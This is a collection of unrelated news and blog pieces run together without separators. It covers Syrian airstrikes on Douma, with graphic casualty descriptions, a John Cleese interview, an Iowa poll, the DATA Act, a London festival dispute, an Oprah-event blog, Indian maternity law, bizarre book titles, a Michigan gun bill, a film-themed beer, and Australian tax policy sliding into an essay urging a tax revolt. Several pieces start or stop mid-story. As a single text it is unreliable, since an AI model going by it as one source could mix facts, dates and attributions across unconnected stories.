[F]ound out that there were no rebels' presence or any military centers or gatherings in any of the areas that was targeted by government forces. The operation didn't have distinguishable or known target[s] as neighborhoods, hospitals, markets were all targeted and citizens were killed regardless of their beliefs.
The sanguinary attacks came after a recent BBC interview with Assad. He stated that any attack perpetrated by his forces is aimed at terrorists to protect civilians.
He's trying to convince monkeys and donkeys on humans planet.#دوما_تباد pic.twitter.com/qlPUZSEbLY — Abdulhadi Almutairi (@Hadutchi) February 10, 2015
According to the report, aerial strikes, primarily barrel bombs and missiles, destroyed dozens of residential buildings, two ambulances, schools, mosques, and the central and main medical point in Douma city.
A graphic video released by Shaam Network News on YouTube shows a distorted and bloodied young girl sitting on a hospital bed against a poorly sanitized wall. A man is heard telling the medics in Arabic that “her entire family is gone [and that] she was the only survivor.”
The attacks, which received little to no recognition from mainstream media, prompted users on social networking sites to spread awareness using the hashtags #Douma_Exterminated and #دوما_تباد in both English and Arabic interchangeably.
Twitter user Mudar Shanwan, who currently resides in Istanbul, Turkey, tweeted a photograph of civilians in Douma helping each other while walking on rubble, with the caption: “we just want to be human again.”
Doesn't aspire to much .. just we want to be Human again #Here_Doma #دوما_تباد pic.twitter.com/E4vrMCkUxN — mudar shanwan (@MudarShanwan) February 11, 2015
Twitter user Omar Halbooni also shared an aerial shot showing complete destruction:
Horrible scenes might not be seen since world war , destroyed by Assad . #Douma_Exterminated #دوما_تباد pic.twitter.com/UVzjL6hskj — عمر (@OmarHalbooni) February 11, 2015
Syrian journalist and writer Dr Ahmad Muaffaq angrily protested the global community for not adequately reacting to the news:
سوء ما فينا هو أفضل من أفاضل من فيكم ..دوما تباد ولا تتحرك فيكم شعرة ..عالم قذر حقير #دوما_تباد pic.twitter.com/mNkhhHgm7T — د ـ أحمد موفق زيدان (@Ahmadmuaffaq) February 11, 2015
Our worst beats the best of yours, Douma is being exterminated and you do not react. The world is despicable.
Many users also shared graphic content of the attacks' horrific aftermath, sharing photographs with rows of children's bodies lined on the ground for family members to claim them. Photographs of those who survived showed children covered in blood, some with body parts missing, barely recognizable.
Sharing a graphic photograph of a child with a defibrillator pressed against her chest in an attempt to restart her heart, this Twitter user said:
Rawia Alhoussaini shared photographs of her destroyed family house:
This Twitter user said that the hashtags provide the world with a grim view of what is happening in Damascus suburbs:
#دوما_تباد (Arabic for #Douma_Exterminated ) gives grim window into ongoing destruction of the Damascus suburb. — Known Gnomes (@UnknownUngnomes) February 10, 2015
Twitter user Omar also added:
unspeakable horrors were committed in Douma. if you'd like to see for yourself click on these hashtags: #دوما_تباد #Douma_Exterminated — عمر (@MidEasternist) February 10, 2015
In a Facebook post, acclaimed Syrian artist Tammam Azzam asks:
هل أفرغ العالم كل عواطفه في مشاهدة قتل رهينة، وحرق طيار، ثم صمت عن دوما؟!!!
Did the world exhaust its emotions after watching ISIS footage killing hostages and burning pilots, and only knew silence when it came to Douma?
Dubai-based Khaled Akbik questioned the world's priorities:
While everyone's busy following Jon Steward & ISIS news.More than 150 ppl were killed by regime forces in Duma. #Syria. #Douma_Exterminated — Khaled Akbik (@Khaledtron) February 11, 2015
Karam Foundation Director of Innovative Education Kinda Hibrawi asked where humanity went:
'Comedy Is Extraordinarily Difficult': John Cleese On Being Funny
So, Anyway... by John Cleese Paperback, 392 pages | purchase close overlay Buy Featured Book Your purchase helps support NPR programming. How?
John Cleese is a big, tall, stiff-upper-lipped international symbol of British wit. He's made us laugh in Fawlty Towers and movies including Monty Python and the Holy Grail, Time Bandits, A Fish Called Wanda, and, recently, as the exasperated master of spycraft — Q — who gives James Bond some of his best toys to break.
Cleese has written a memoir that brings him from boyhood in a quiet British town called Weston to the footlights of London and screens all over the world. It's called So, Anyway...
The title comes from that thing people say when they tell stories but lose track of the main point, Cleese explains to NPR's Scott Simon.
"There's always a slightly awkward pause, and then they say, 'So, anyway ... ' " Cleese says. "So that was just a little private joke, which is now a public joke."
Interview Highlights
On the surprising advice he gives young comedy writers
I tell them to steal, because comedy is extraordinarily difficult. It's much, much harder than drama. You only have to think of the number of great dramatic films and then compare that with the number of great comic films ... and realize that there's very, very few great comedies and there are lots and lots of very great tragedies, or dramas. That tells you, really, which is the hard one to do. So at the very beginning, to try to master the whole thing is too difficult, so pinch other people's ideas and then try to write them yourself, and that'll get you started.
YouTube
On the origins of the dead parrot sketch
Python fans know it pretty well, but it was originally a sketch about a secondhand car, which was not a bad sketch because the guy who was trying to avoid responsibility for selling a bum car was a funny character. But then when we started Python, Graham Chapman and I decided that we liked the characters in the sketch, but the secondhand car bit was very stale and cliched. So we had a nice long argument. Eventually we decided it would be best if it was a pet shop. Then we had a long discussion about what the animal was going to be, because the animal was obviously going to be dead — not injured, which wouldn't have been funny ... We went through various creatures, and we just decided that the parrot was the funniest one.
On writing jokes
I think if you start trying to write jokes that you don't think are funny in order to make a sort of theoretical audience somewhere else laugh, I think that's death. I think you've got to do what you find funny yourself and just hope that people find it funny.
On strangers' reactions to seeing him
When they come up, they usually say, 'Mr. Cleese, I'm a huge fan,' and then, I'm always amused, they then add, 'You know, Monty Python and Fawlty Towers,' just to let me know that they don't think I was in Ben-Hur or anything like that.
Photo
Donald J. Trump and Senator Ted Cruz of Texas remain locked in a tight race for the lead in Iowa less than three weeks before the state's caucuses, according to a new poll.
A survey from Quinnipiac University released on Monday found that 31 percent of likely Republican caucusgoers are planning to back Mr. Trump, while 29 percent support Mr. Cruz. The poll had a margin of sampling error of plus or minus four percentage points.
Mr. Trump and Mr. Cruz remain essentially tied in the crucial state that kicks off the presidential nominating process. Trailing them are Senator Marco Rubio of Florida, at 15 percent, and Ben Carson, the retired neurosurgeon, whose support has dropped to 7 percent.
“The Iowa Republican caucuses are tight as a tick entering the final two weeks of the campaign,” said Peter A. Brown, assistant director of the Quinnipiac University Poll. “Voters like Senator Ted Cruz better than Donald Trump and give him much higher scores for honesty, empathy, experience and for sharing their values.”
Mr. Cruz has seen a surge in popularity in Iowa, where the caucuses take place on Feb. 1, in recent months as he has consolidated the support of evangelical Christian voters and as Mr. Carson's backing has receded. But Mr. Trump has been attacking the Texas senator more aggressively of late, raising questions about the Cruz family's roots in Cuba and Canada. A December poll from Quinnipiac also showed Mr. Trump leading Mr. Cruz by a single percentage point, suggesting the dynamics in the state are starting to stabilize.
While Mr. Trump remains polarizing in Iowa, he is viewed by many as the best suited to handle the economy and terrorism, which Iowans view as the most important issues facing the country. Republicans in the state also like his stance on immigration, which includes building a wall along the border with Mexico and deporting anyone who has entered the country illegally.
Mr. Cruz is seen as stronger generally on foreign policy, more trustworthy and more empathetic than Mr. Trump.
The poll finds that the rest of the Republican field has largely faded in Iowa, with Gov. Chris Christie of New Jersey with 4 percent support and former Gov. Jeb Bush of Florida at 3 percent.
Find out what you need to know about the 2016 presidential race today, and get politics news updates via Facebook, Twitter and the First Draft newsletter.
By Hudson Hollister
Even as the debate over official secrecy grows on Capitol Hill, basic information about our government's spending remains hidden in plain sight.
Information that is technically public -- federal finance, awards, and expenditures -- is effectively locked within a disconnected disclosure system that relies on outdated paper-based technology. Budgets, grants, contracts, and disbursements are reported manually and separately, using forms and spreadsheets. Researchers seeking insights into federal spending must invest time and resources crafting data sets out of these documents. Without common data standards across all government spending, analyses of cross-agency spending trends require endless conversions of apples to oranges.
For a nation whose tech industry leads the world, there is no reason to allow this antiquated system to persist.
That's why we're excited to welcome Thursday's unanimous Senate approval of the Digital Accountability and Transparency Act -- known as the DATA Act.
The DATA Act will mandate government-wide standards for federal spending data. It will also require agencies to publish this information online, fully searchable and open to everyone.
Watchdogs and transparency advocates from across the political spectrum have endorsed the DATA Act because all Americans will benefit from clear, accessible information about how their tax dollars are being spent.
It is darkly appropriate that the only organized opposition to this bill took place behind closed doors. In January, Senate sponsors Mark Warner (D-VA) and Rob Portman (R-OH) rejected amendments offered privately by the White House Office of Management and Budget. These nonpublic proposals would have gutted the DATA Act's key data standards requirement. But Warner and Portman went public with their opposition, and Republicans and Democrats agreed to keep a strong standard mandate.
We now await swift action by the House of Representatives to pass this bill and put it on the President's desk.
The tech industry is already delivering the technology and expertise that will use federal spending data, once it is open and standardized, to solve problems.
If the DATA Act is fully enforced, citizens will be able to track government spending on a particular contractor or from a particular program, payment by payment. Agencies will be able to deploy sophisticated Big Data analytics to illuminate, and eliminate, waste and fraud. And states and universities will be able to automate their complex federal grant reporting tasks, freeing up more tax dollars for their intended use. Our industry can perform these tasks -- as soon as we get the data.
Chairman Earl Devaney's Recovery Accountability and Transparency Board proved this is possible. Starting in 2009, the Recovery Board applied data standards to track stimulus spending. Our members' software used that data to help inspectors general prevent and recover over $100 million in spending on suspicious grantees and contractors. The DATA Act applies that approach across the whole of government spending.
Congress is now poised to pass this landmark legislative mandate to transform spending from disconnected documents into open data. Next , the executive branch must implement that mandate.
So our Coalition's work continues. We will press the Treasury Department and the White House to adopt robust, durable, and nonproprietary data standards for federal spending.
And we won't stop with spending transparency. The American people deserve access to open data across all areas of government activity -- financial regulatory reporting, legislative actions, judicial filings, and much more.
When I helped write the first version of the DATA Act three years ago, it was clear that the tech industry would have to support this transformation. That's why I left the Congressional staff to launch the Data Transparency Coalition. Thanks to early and steadfast support from companies like Teradata and WebFilings, we have built a critical mass of support for open data reforms.
Sunlight is more than a powerful disinfectant. It also nurtures growth.
Properly implemented, the DATA Act will turn the federal government's spending information into a new public resource. Open data will generate opportunities for businesses, government, and citizens to produce valuable new insights into federal spending.
Change is dawning. We're ready to get to work.
Hudson Hollister is the Executive Director of the Data Transparency Coalition.
ES News Email Enter your email address Please enter an email address is invalid Fill out this field Email address is invalid You already have an account. Please log in or register with your social account
Campaigners are calling for a huge north London music festival to be axed after it was beset by rampaging gatecrashers last year.
Residents say the Wireless festival brought "scary" disorder to Finsbury Park in July 2015 and also left the green space in tatters, with the ground looking like a “desert” and strewn with laughing gas canisters and broken glass.
The festival was attended by 50,000 people each day and featured acts such as Drake, David Guetta and Nicki Minaj.
But it hit the headlines for the wrong reasons after large crowds of youths were filmed repeatedly trying to break into the event, with many successfully storming through fences.
One shocking video showed a lone police officer attempting to hold off a crowd of would-be gatecrashers with a baton.
At least eight people were arrested during the course of the event, including for knife possession and actual bodily harm.
Now the Friends of Finsbury Park are leading a campaign against plans for this year's festival, which they say is oversized, attracts anti-social behaviour and causes their windows to shake from the booming noise.
They also feel it is unfair to exclude local families from such a large area of the park with unsightly fencing they claim spoils the atmosphere.
Tom Palin, 47, the group's chairman, told the Standard: "Last year the event caused severe damage to the fabric of Finsbury Park.
"It turned the grass into desert scrubland which stayed that way for months. It encloses a third of the park in a huge sheet metal fence, locking out families.
"It's unbelievable that it's allowed to happen. There were problems with break-ins and public disorder last year, it's a scary situation.
"It's a horrible thing to happen in your local park and it doesn't feel very safe or controlled."
The organisers recently applied to Haringey council, which manages the park, for permission to stage the event again on July 8, 9 and 10.
In a formal objection letter, the Friends group said stewards had privately admitted feeling "intimidated and unsafe" by the large crowds trying to break in.
"We also strongly refute [the organisers'] assertion that they can effectively police the lengthy perimeter fence," they added.
"How many police would it require to effectively secure the lengthy perimeter?"
Local MPs David Lammy, for Tottenham, and Catherine West, for Hornsey and Wood Green, have both voiced worries about the festival.
Mr Lammy, who complained last year that the park was left looking like the "Serengeti", said he was “deeply concerned about the environmental damage and significant loss of amenity” for residents.
Ms West penned a letter to the council raising a series of concerns, including complaints about rubbish being thrown into front gardens last year and people even using them as toilets.
The festival's organisers and Haringey council have been approached for comment.
Anyway, I was blown away by her story and the powerful way she communicates and holds a room. 13,000 people strong, and I know the back row was completely dialed in to everything she said. But Jenny, wow, she was enthralled–like I've never seen her.
The next morning, Jenny meditated with Deepak. She's never meditated with me. It's funny, I'm somewhat of an expert of meditation, but I can't get Jenny into it. She's humored me a couple of times, but it's never worked for her. But in a crowded, noisy stadium she was able to do it.
Then she listened as Liz Gilbert talked about finding herself on a hero's journey with tear in her eyes. As she did the exercises in the program, she and Betsy kept whispering to each other.
I was analyzing and learning, but Jenny was changing and growing.
When Rob came out, it seemed like Jenny connected with his work for the first time. I was puzzled by this, until I realized the obvious—this was a safe environment for women. There were not enough men to bluster and dominate. We were in a hive of womanhood. There was perhaps one man for every 30 or 40 women in the room.
I was just a guest at their party. Here, in an arena full of other women, my eyes were opened to the depth of male privilege for the first time.
I'm pretty progressive about gender. Actually, that's just false modesty: I'm a male feminist. But, I'd never really understood male privilege really looks like until that moment. When men are present in suitable numbers, women have to either fit the mold of social expectation, or rebel against it to break the mold. Neither of those are an authentic representation of self.
Jenny was crying at the end. Jenny is not the soft, sentimental crier I am. It takes a lot to move her needle so to speak.
We drove down, so we had to drive back. It's 7 hours. Betsy had a conference in Lakeland the following week, so we drove there first to drop her off. Something was stirring in Besty and Jenny, something powerful. Spiritual awakening. The voice of God was speaking.
God came to me through Rob Bell and the waves of the Pacific, and God came to Jenny through Oprah and the Trailblazers and a 7 hour car ride.
Jenny has good days and bad days with God. She's not prone to the same obsessive introspection and fact-finding that drives me. But here, after Oprah, Jenny seemed comfortable with God again. She prayed in the car—and she started to get a vision of the work she wants to do with God.
Not how she wants to support my work. She was already there. I'm talking about her work.
After 14 years of marriage, and I mean 14 absolutely SPECTACULAR years, we clicked in a new, more powerful way. I saw new things in her, and she saw new things in me, and God came and just laughed as drove home together.
All that because my wife had the space to listen for God in the company of other women. I'm more convinced than ever that men have a vital role to play in a society–and a faith–that supports women as full equals to men.
29 March 2017 National
Women employees will now be able to get paid maternity leave of 26 weeks, up from 12 weeks, as per a new law.
President Pranab Mukherjee has given assent to the Maternity Benefit (Amendment) Act, 2017 that has made changes in some of the provisions of over 55-year-old law entitling certain benefit to women employees.
The new law makes it mandatory for every establishment with fifty or more employees to have the facility of creche within a prescribed distance.
The employer is also bound to allow four visits a day to the creche by a woman.
Every establishment shall intimate in writing and electronically to every woman at the time of her initial appointment regarding every benefit available under the new law, the statute says.
An employer can also permit a woman to work from home after she has availed maternity leave.
"In case where the nature of work assigned to a woman is of such nature that she may work from home, the employer may allow her to do so after availing of the maternity benefit for such period and on such conditions as the employer and the woman may mutually agree," it says.
The law also allows maternity leave of 12 weeks for a woman who adopts a child below the age of three months, and for commissioning mother (a biological mother who uses her egg to create an embryo implanted in any other woman).
The entitlement of 26 weeks paid leave under the law is only for first two children. A woman with two or more children will be entitled to 12 weeks of maternity leave, says the law which will apply to all establishments employing 10 or more people.
The statute that will help approximate 1.8 million women workforce in organised sector, has amended Maternity Benefit Act, 1961 that regulates grant of maternity benefit to women employees in certain establishments.
The Maternity Benefit (Amendment) Bill was passed by Lok Sabha on March 9 and Rajya Sabha on March 20.
India is at third position globally in terms of the number of weeks of maternity leave after Canada (50 weeks) and Norway (44 weeks).
I always knew there were some bizarre books out there, but I was not aware quite how bizarre until researching this post. Here are 13 books that I consider to be bizarre. I have added pithy comments/fictitious dialogue below each.
Gadsby: A Lipogram Novel
This 50,000+ word lipogram novel claims not to use the letter e.
How many e's can you spot on the front cover?
Highlights in the History of Concrete
If you're going to go to the trouble of writing a book about the history of concrete, you might as well tell the whole story.
Sexual Analysis of Dickens' Props
I always knew that chair in Oliver Twist had sexual connotations, but no one would listen.
The Big Book Of Lesbian Horse Stories
One Amazon reviewer claims that The Big Book Of Lesbian Horse Stories is merely a normal sized book of lesbian horse stories.
Latawnya, the Naughty Horse, Learns to Say “No” to Drugs
This is how I imagine Latawnya the Naughty Horse learns how to say ‘No' to drugs.
Someone walks into Latawnya's stable holding some drugs.
Person: ‘Hi Latawnya you naughty horse, would you like some drugs?'
Latawnya: ‘Neighhhh.'
‘Let's try that again shall we. Would you like some drugs?'
‘Neighhhh.'
‘Would you like some drugs?'
‘Neighhhno.'
Latawyna has learnt to say no to drugs. Have you?
Castration: The Advantages and the Disadvantages
You mean to say there are disadvantages.
How to Speak Cat: The Essential Primer of Cat Language
Purr whilst rubbing against someone if you want something, arch your back and hiss if you are angry, meow for everything else.
Anybody Can Be Cool– But Awesome Takes Practice
Oh, awesome takes practice! That explains why I've been stuck on cool for so long.
How to Avoid Huge Ships
Don't go on cruises or swim in harbours.
Why Not Eat Insects?
Why not indeed!
How Green Were the Nazis?: Nature, Environment, and Nation in the Third Reich
The Nazis may have killed millions of people, but when it came to recycling…
Dating for Under a Dollar: 301 Ideas
Go to McDonald's with your date and order a grilled onion cheddar burger from the dollar menu, then pull out 99c and plead until they let you off the 1c. Now cut the burger in 2 and give her/him half, but with all the onions.
Date: ‘All the onions? That's so kind. Are you sure?'
You: ‘Yes I'm sure. Now eat them before I change my mind.'
Does GOD Ever Speak through CATS?
Cat: ‘Meow! Meow! Purr, purr, meow, hiss! MEOW! MEOW!'
Person: ‘Are you sure God? We already have 10 Commandments, do we really need an 11th?'
…………………………………………………………………………………………………………………………
Share this: Tweet
Like this: Like Loading...
CLOSE Permitless Gun Carry Debate. Robert Killips | Lansing State Journal
The House Judiciary Committee meeting room is full necessitating the use of an overflow room as lawmakers discuss HB 4416 Tuesday, May 16, 2017. (Photo: Robert Killips | Lansing State Journal)
LANSING — The issue of gun control descended full force on Lansing on Tuesday as the House of Representatives began hearings on a proposal to allow anyone to carry a concealed weapon without having to get a permit or training.
“It is currently legal in the state of Michigan for a law-abiding person to openly carry a firearm on their person without any training classes, fees or state bureaucracy. It only becomes illegal when a person puts on a coat because the gun then becomes concealed,” said Rep. Michele Hoitenga, R-Manton, a sponsor of one of the four bills in the gun package. “Our Second Amendment should not be used as a money grab for permit fees.”
The hearing room and two overflow rooms were packed with people on both sides of the issue including a large contingent from Moms Demand Action for Gun Sense in America, which advocates for more gun control.
Related:
“This is a dangerous bill that would allow people in Michigan, including stalkers, to carry a weapon. By no means am I anti-gun. I've been around guns all my life,” said Scott Nichols, a member of Moms Demands Action and a former Michigan State Police trooper. “You're opening the door for certain convicted criminals to carry concealed weapons. This bill does nothing to increase the safety of Michiganders, but makes the jobs of law enforcement harder.”
Tom Lambert, Michigan Open Carry president and legislative director, said the current law is essentially a “coat tax,” requiring people to pay for a license just for the privilege of putting on a coat that covers their weapon.
“I do have people tell me they don't want to have to get a government license and that's their decision to make,” he said. “But this would allow someone to put a coat on without getting permission from the government.”
Current law requires people to get a concealed pistol license from the state — at a cost of about $100 — and take eight hours of gun safety training.
Dr. Jerry Walden, left, from Physicians for the Prevention of Gun Violence, talks with Theresa Turner from Mt. Pleasant before the start of the House Judiciary Committe meeting Tuesday, May 16, 2017. Several Republican legislators have introduced bills that will allow citizens to carry concealed firearms without a permit. (Photo: Robert Killips | Lansing State Journal)
The proposed bills would:
Allow anyone to carry a concealed pistol without having to get a permit or training except for people who are prohibited by state or federal law from possessing a firearm because of certain criminal convictions.
Remove carrying a firearm — whether it's concealed or not — from laws that prohibit carrying dangerous weapons.
Repeal a provision that allows security guards to only carry a concealed weapon when they're on duty.
The Legislature has struggled to find consensus on gun measures since Gov. Rick Snyder vetoed a bill in 2012 that would have allowed concealed weapons to be carried in gun-free zones. Snyder vetoed the bill in the days following the deadly shootings at Sandy Hook Elementary School in Connecticut in which Adam Lanza shot and killed 20 students and six staff members before killing himself on Dec. 14, 2012.
Rochelle Riley 2015 column: We are cowards when it comes to gun control
Brian Dickerson 2016 column: What if the problem is all in the perpetrators' heads?
After more than two hours of testimony, the committee didn't take a vote on the bills — HB 4416-4419 — but is expected to in the coming weeks.
"We're definitely going to have another hearing on this next week," said Rep. Jim Runestad, R-White Lake, the chairman of the Judiciary Committee. "I don't want to move this fast without the committee being comfortable."
State Rep. Tim Greimel, D-Auburn Hills, wondered why some gun enthusiasts were opposed to gun safety training, noting, "It doesn't seem like an onerous process that we have now."
David Heller of the Fraternal Order of Police agreed.
"To put a firearm in someone's hands with absolutely no training is absolutely absurd," he said. "We stand absolutely opposed to this legislation."
But Michael Thiede of the Michigan Gun Owners Association said before concealed-weapons permits were required, "I didn't have to take a class to tell me I was going to be safer to do all of these things. I didn't have to give state an extra $105. Concealed pistol permits didn't make this state any more safe. It just made it richer."
Contact Kathleen Gray: 313-223-4430 or kgray99@freepress.com. Follow her on Twitter @michpoligal.
Read or Share this story: http://on.freep.com/2qP0DSR
Uncle Billy's makes film-inspired beer, the Hell or High Water lager
Starring Chris Pine and Jeff Bridges, the upcoming film “Hell or High Water” depicts scenes of rugged West Texas beauty, juxtaposed with the story of two desperate brothers, played by Pine and Ben Foster, who decide to hold up banks in an effort to save their family's land.
And in Austin, the modern-day outlaw movie will be accompanied by something boozy: Uncle Billy's Brewery and Smokehouse has made a lager inspired by “Hell or High Water.” The Hell or High Water LAWger, as the brewpub is calling it, was made with the addition of prickly pear — to give it just the right amount of West Texas flair.
“It's a traditional-style German lager with a slightly sweet maltiness enhanced with earthy, sweet flavors and a beautiful, vibrant color from prickly pear cactus grown in West Texas,” Uncle Billy's head brewer Trevor Nearburg said in a press release.
The prickly pear, assistant brewer Daytona Camps said in an interview, isn't as sweet as you might think — instead, it contributes an earthiness to Uncle Billy's Lazy Day Lager base. The prickly pear, which she said “represents Texas so well,” is added as a puree.
“I was not expecting to be able to brew a beer for a movie, especially one with Jeff Bridges and Chris Pine,” she said. “It's still a mind-boggling experience, especially when we heard the cast and crew all really liked it.”
“Hell or High Water” debuts in limited release on Aug. 12 and more widely on Aug. 19. Also starting Aug. 12, the beer will only be available at Alamo Drafthouse's South Lamar location, as well as Uncle Billy's, until the small-batch brew runs out.
The man chosen by Treasurer Joe Hockey to lead the review of the nation's tax system has publicly criticised the British government's "Google tax", the inspiration for the Coalition's looming crackdown on multinational profit shifting.
Robert Jeremenko, who is running the tax white paper process in Mr Hockey's office, described the British government's "Google tax" late last year as a media-friendly "soundbite" that could undermine global efforts to tackle multinational tax avoidance.
Joe Hockey was more amenable to the idea of curbing excessive superannuation tax concessions. Credit:Graham Denholm
On Sunday Mr Hockey said Australia "can learn a lot from what the British are doing with their so-called Google tax", and announced that Australian officials would travel to Britain to work on the implementation of the 25 per cent tax on profits diverted out of the country.
Mr Hockey said Australia did not need to introduce a new tax and it is understood the government believes it can achieve similar results by broadening the existing tax base.
The purpose of tax is in two parts: one is to raise funds for public services and investment, the second is to avoid the hoarding of wealth by redistributing it through taxation. However, changes in tax law in favour of an ever wealthier capitalist class have turned the tax system on its head so it delivers quite the opposite. Is it time for us to knock this unfair, dysfunctional system on the head and stage a tax revolt?
The Great Tax Break
Myths about corporations include:
a) they are wealth creators,
b) they pay a great share in the total tax revenues of the country and
c) reducing their tax bill means they will pay more. Now to reality…
It was revealed today that only one in four of the UK's top companies pay their taxes, meanwhile they were receiving tax credits to the tune of hundreds of millions of pounds by people who did pay their taxes.
Company taxes now constitute only 12.5% (Corporation Tax is just 7%) of the tax revenues of the UK. In comparison, the people's taxes, (income tax and VAT) make up more than 60% of the tax income.
Corporation Tax is lower today than at any time in its history. UK Corporation Tax in 1984 was 52%. By 1986 it was 36%. In 1999 it dropped to 30% and in the most recent budget it was cut to 21%.
Corporations have never had it so good.
The result of these tax changes is that tax receipts are lower today than in 1963. Worse, the composition of those taxes have changed as tax cuts to the wealthiest have seen tax rises to non means tested taxes that hit everyone.
Between 1979 (the launch of Thatcherite Neoliberalism)and 2012 the top rate of income tax was cut from 98% for unearned income and 83% on earnings, to a flat 45%. At the same time, VAT which applies to almost everything your regular person might buy rose from 8% to 20%. National Insurance has shot up from 6.5% to 12%.
This has meant that whilst income taxes have dropped as a proportion of income for most since 1979, income tax as a proportion of income has dropped significantly more for those earning higher incomes, and the total tax bill for a waged earner overall has increased to attempt to cover the shortfall of a great tax break for the wealthiest.
In short, we are the wealth creators (of any wealth that is shared, not hoarded), we pay the lion's share of the taxes in the country and our taxes have gone up to compensate for their taxes going down.
Corporate Welfare
It's egregious enough to find that far from us all being in it together, the wage earning tax payer is paying a far higher proportion of the public services bill than the corporation or those who earn their income outside of wages. However, not only are they not paying their fair share into the public pot, they are actively taking cash out of it is for themselves.
Obviously the most high profile case of this was the Bank Bailout. To date, the UK taxpayer, without being consulted, has been made to pay almost 2 trillion pounds, that is two thousand billion pounds, to the richest people on earth. To put this in context: the total UK government spend per annum, is £694.9bn. So four years of total government spending has been spent in on ‘saving' the banks. This is twenty years of NHS spending (£106.7bn a year), forty years of education spending (£48.2bn), or five hundred years of job seekers allowance (£4.9bn a year). This is the sheer, horrifying scale of the so-called Bankers Bailout.
However, a raft of other corporations are, quite legally thanks to a tax system ever more designed to enrich the richest with the fund of the poorest, are on the take.
In a stunning (albeit rare) piece of investigative journalism, the Mail on Sunday broke one the story of corporate welfare in a way not achieved by any one in recent years.
Experian, a credit scoring firm made a £454m profit in the UK least year. They not only paid no tax, but received £159m is tax credits. The paid minus £159m in tax.
Royal Sun Alliance, the insurer, made £613m in profits, paid no tax but received £8m in tax credits from the public purse.
G4S, the private security firm which made a £279m profit last year by running prisons, the probation service and some police stations: paid no tax, but received £8m in tax credits.
Vodafone, the telecommunications firm made a whopping £9.5bn profit, paid no tax but received £4m from the tax payer in credits.
The list goes on. This is flagrant corporate welfare. In fact, the so called ‘Research & Development Tax Credit' has risen from £70m in the year 2000, to more than £1.1bn now. That is twice what we spend on Standards and Qualifications in the national education system.
Now before some bright spark starts hailing the R&D budget and reminding me why it is so important, you might want to read a tax avoidance piece in Telegraph by KPMG. This article in a mainstream British newspaper specifically cited the R&D tax credits as a tax avoidance scheme.
No one is arguing it doesn't make sense to invest in our future. But it should be all of our future we're investing in, we should have a democratic say in what our money is invested in and investment should not be compelled from the poor while being optional for the rich.
Thanks to the Pay As You Earn system, and VAT being applied to products in stores whether we like it or not, the average person has no means of escaping this bogus tax and spend injustice. Or do we?
The Curious Case of the Crowd
The advent of crowd funding and crowd sourcing could be the dawn of the next great idea, in terms of how we develop and fund the things that matter to us.
Crowd funding is an online donation system, where if someone has an idea, a need, a project, or anything which requires investment, they share it on a website and people can donate money to their idea. If the total amount required is not raised, then all investors get their donation back.
This is a win-win for both the producer and the investor. The producer, be they musician, scientist, campaigner or business is no longer beholden to a small pool of large donors and therefore no longer necessarily influenced. Also, anyone can now be an investor. The playing field for investment is democratised and levelled.
Crowd Sourcing (also known as open sourcing) sourcing is where rather than working on a new idea in isolation in order to patent the discoveries oneself to make a profit – people choose to open up development, via the internet, to get the most people to solve the problem in the shortest time.
Recent successes have been made in this area by scientists and artists who have found the old capitalist approach of patent/copyright a barrier rather than a stimulant of progress in their field.
This means that people have, of their own volition, moved from a competitive model of research and development incentivised by profit, to a collaborative approach based on best results. This is something which should thrill the bejesus out of us, and I believe presents a reason to be cheerful.
Asking the Crowd Works
One story which may well blow your mind comes from a lab team at Harvard University. They decided that, rather than follow the normal development model for cancer drugs, they would open source it. This meant, rather than the normal pattern of super high secrecy to develop a drug in house, or attach its development to a large drug company – Jay Bradner and his team simply opened up their labs and their research to any individual lab or research team that wanted to participate. They then created their own spin out companies to roll out the drug into clinical trials and the project has been a massive success.
Now, if we can develop potential cancer cures by crowd sourcing, what else is available? Interestingly enough, the spin out company here Tensha, went through normal Series A funding (venture capital) but it could just as easily have been crowded funded. Imagine then that not only could we cut big money out of the development process, but we could cut them out of the business end aswell.
Perhaps the most lucid argument I have heard in favour of Crowd Funding was put forward by artist and musician Amanda Palmer. Amanda raised $1.2m for a musical project. She chose to crowd fund her musical career because she had got so much from the period of time when her musical career was funded by people throwing coins into her bucket while she busked.
To Amanda, the musician should be unafraid to ask what they are worth, rather than telling people what they are worth and enforcing that worth through copyright laws. She despairs that Hollywood copyright lobbies, the newspapers and other businesses are tying themselves in knots with the question: ‘How do we make people pay for our product?'
Amanda believes that producers should instead ask ‘How do we let people pay for our product?' and a critical component of that is asking what the product is worth.
What the Hell Has This Got to Do With Tax?
On the surface, perhaps nothing. However, I believe a basic principle is at play here – do we ask people to contribute or do we make them? Currently, the richest are neither being asked, nor being told. Everyone else is compelled by law to surrender ever increasing amounts to a government that fails to reinvest that money in their communities, but supports the ever increasing wealth gap by siphoning it off to private interests in a totally undemocratic fashion.
Now, imagine we could develop crowd sourcing and crowd funding alongside the current system to such a degree that the majority of us who do not support the current tax system could circumvent it? What if we achieved better results in science, education, music, campaigning and other things with this method than the state capitalist model? If we had this alternative, could we not simply turn off the tap and stop paying our taxes?
In recent months crowd funding has seen some huge successes. This year, $6bn will be raised through crowd funding, double last year's total. Still small, but growing. Not only has a huge amount been raised but across a vast breadth of types of endeavour, and across the globe.
Notable projects include, the Do Good Bus where $100k was raised to a cause to increase volunteering by running monthly bus trips which take wannabe volunteers to different projects. They've made volunteering and community building sexy again, by wrapping the whole thing in a sense of adventure. You get on the bus, you don't know where you will end up, who you will help, or how. The result is awareness raising, an ever growing network of engaged, enthused volunteers and a community getting to know itself.
The Rushmore Group run some of the most well known and well loved independent bars in London, including Milk and Honey,and Danger of Death. They recently broke the record for UK crowd funding when they raised £1m from 143 investors to open a new bar.
Individuals also attain funding or input for more personal reasons. When open source engineer and artist Salvatore Iaconesi was told he had an untreatable form of brain cancer, his response was to hack into his medical records and release them online inviting all comers to crowd source potential cures.
When Donnie Collins was told he could not receive funding by state or insurance company for the medical treatment necessary to complete his female to male gender transition in the US, his college fraternity set up a crowd funding page on IndieGoGo to raise the $8,000 required. Not only did they raise the $8k, but the total has exceeded $18k and the extra funds are being donated to the Jim Collins Foundation which provides financial support to people seeking gender reassignment surgeries.
What these latest innovations have shown is that where our current democracy of state and market fail, digital democracy can win by introducing infinitely more people with ideas to infinitely more people with the ability to fund them.
The Road to Tax Revolt
In crowd sourcing and funding combined, we democratise the act of giving, we level the investor playing field, and we create a worldwide platform for new ideas to be shared, funded and developed into reality. If we were to continue to grow this approach, delivering ever greater personal, community and global successes, we could succeed in doing the unthinkable: creating an alternative model that works.
With a new model tempting us all into it, not through rhetoric but through success in meeting our needs, we could simply say enough is enough and cease to pay these abysmal taxes to these undeserving corporate and political giants.
